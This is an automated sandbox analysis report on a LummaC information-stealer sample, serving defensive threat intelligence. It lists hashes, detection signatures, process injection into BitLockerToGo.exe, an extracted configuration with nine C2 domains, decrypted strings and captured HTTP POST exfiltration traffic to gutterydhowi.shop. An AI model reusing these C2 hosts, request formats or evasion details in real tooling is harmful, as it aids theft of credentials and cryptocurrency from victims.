Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1521515
MD5:	54e50cc52a1d35cdd951d475e0fb7aa9
SHA1:	b5f83428a5b8c07dbd239beed5605282f73e5dbd
SHA256:	d3bdd83b9fe90afaead22c1e6bfc2051e6cfa6e885986cc4c87708415d0484f8
Tags:	exeLummaStealeruser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 54E50CC52A1D35CDD951D475E0FB7AA9)

BitLockerToGo.exe (PID: 2716 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["vozmeatillu.shop", "ghostreedmnu.shop", "offensivedzvju.shop", "fragnantbui.shop", "gutterydhowi.shop", "drawzhotdog.shop", "reinforcenh.shop", "pianoswimen.shop", "stogeneratmns.shop"], "Build id": "tLYMe5--2"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000002.1802808473.000000000217D000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
1.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T20:30:12.194811+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49730	172.67.132.32	443	TCP
2024-09-28T20:30:13.401073+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49731	172.67.132.32	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T20:30:12.194811+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49730	172.67.132.32	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T20:30:13.401073+0200	2049812	1	A Network Trojan was detected	192.168.2.4	49731	172.67.132.32	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T20:30:12.005161+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	172.67.132.32	443	TCP
2024-09-28T20:30:12.891286+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.4	49731	172.67.132.32	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T20:30:11.421106+0200	2056164	1	Domain Observed Used for C2 Detected	192.168.2.4	58380	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 1.2.BitLockerToGo.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["vozmeatillu.shop", "ghostreedmnu.shop", "offensivedzvju.shop", "fragnantbui.shop", "gutterydhowi.shop", "drawzhotdog.shop", "reinforcenh.shop", "pianoswimen.shop", "stogeneratmns.shop"], "Build id": "tLYMe5--2"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: pianoswimen.shop
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tLYMe5--2

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.132.32:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.32:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: file.exe, 00000000.00000002.1802808473.000000000239A000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: file.exe, 00000000.00000002.1802808473.000000000239A000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_0040D060
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_0040D060
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	1_2_0040F4B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	1_2_0040F4B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_0040EC00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [eax+esi]	1_2_00407000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	1_2_004490D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_00432080
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	1_2_0040915E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	1_2_0042C170
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	1_2_0042C170
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	1_2_00431110
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], ax	1_2_00429251
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_004452C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	1_2_004452C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	1_2_004452C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_004452C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+7Ch]	1_2_00433FB3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+7Ch]	1_2_00433FB3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, ecx	1_2_004012BF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	1_2_0042E3C2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	1_2_0044B3C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	1_2_0044B3C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_004443D4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	1_2_0041445A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_0044440C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	1_2_00442420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	1_2_0044B550
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	1_2_0044B550
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+7Ch]	1_2_004335DA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	1_2_0042F64F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h	1_2_0044B6D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	1_2_0044B6D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_00430740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_00444740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00428710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	1_2_0041A780
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_00420780
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_00420832
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	1_2_00449950
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	1_2_0044A996
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_00427ADF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_00432AB3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_00432AB3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	1_2_00413B52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	1_2_0040FB7C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	1_2_00404B00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_0043BBD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	1_2_00444B80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	1_2_00405B90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+38h]	1_2_00410BAE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	1_2_00430C40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then dec ebx	1_2_0043FC70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	1_2_00445CE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	1_2_00426C80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00426C80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add esi, 02h	1_2_00413D32
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_0044BDC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_00428DF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000660h]	1_2_0041DE74
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000660h]	1_2_0041DE06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	1_2_0041DE06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh	1_2_00448ED0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00426EF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+34h]	1_2_00445F60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+7Ch]	1_2_00433FB3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+7Ch]	1_2_00433FB3

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.4:58380 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.4:49730 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.4:49731 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.132.32:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: pianoswimen.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop

Source: Joe Sandbox View

IP Address: 172.67.132.32 172.67.132.32

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=ePko5sjqf4a2HTkHHS9QQxBhBcqdvUN3ImaZPw8RSbw-1727548212-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 75Host: gutterydhowi.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: pianoswimen.shop
Source: global traffic	DNS traffic detected: DNS query: gutterydhowi.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop

Source: file.exe	String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: BitLockerToGo.exe, 00000001.00000003.1808487829.0000000002C82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gutterydhowi.shop/
Source: BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002C82000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1808487829.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1808657646.0000000002C84000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1808487829.0000000002C82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gutterydhowi.shop/api
Source: BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gutterydhowi.shop/apiC
Source: BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002C82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gutterydhowi.shop/apisw
Source: BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gutterydhowi.shop/api~
Source: BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gutterydhowi.shop/g
Source: file.exe	String found in binary or memory: https://management.azure.compending
Source: BitLockerToGo.exe, 00000001.00000002.1820785163.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-err
Source: BitLockerToGo.exe, 00000001.00000003.1808467665.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1808487829.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000001.00000003.1808467665.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1808487829.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 172.67.132.32:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.32:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_00438F30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

1_2_00438F30

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_00438F30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

1_2_00438F30

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_0043A2E5 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

1_2_0043A2E5

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_004403D0	1_2_004403D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00447A52	1_2_00447A52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00401000	1_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00437020	1_2_00437020
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0040915E	1_2_0040915E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0044A130	1_2_0044A130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0044A19B	1_2_0044A19B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00429251	1_2_00429251
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_004052C0	1_2_004052C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_004452C0	1_2_004452C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00449FC0	1_2_00449FC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0040B2E0	1_2_0040B2E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0042D2E2	1_2_0042D2E2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0040A2F0	1_2_0040A2F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0040E290	1_2_0040E290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_004012BF	1_2_004012BF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00407340	1_2_00407340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0040136B	1_2_0040136B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0044A320	1_2_0044A320
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0041445A	1_2_0041445A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0043F4C0	1_2_0043F4C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00449480	1_2_00449480
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0042D578	1_2_0042D578
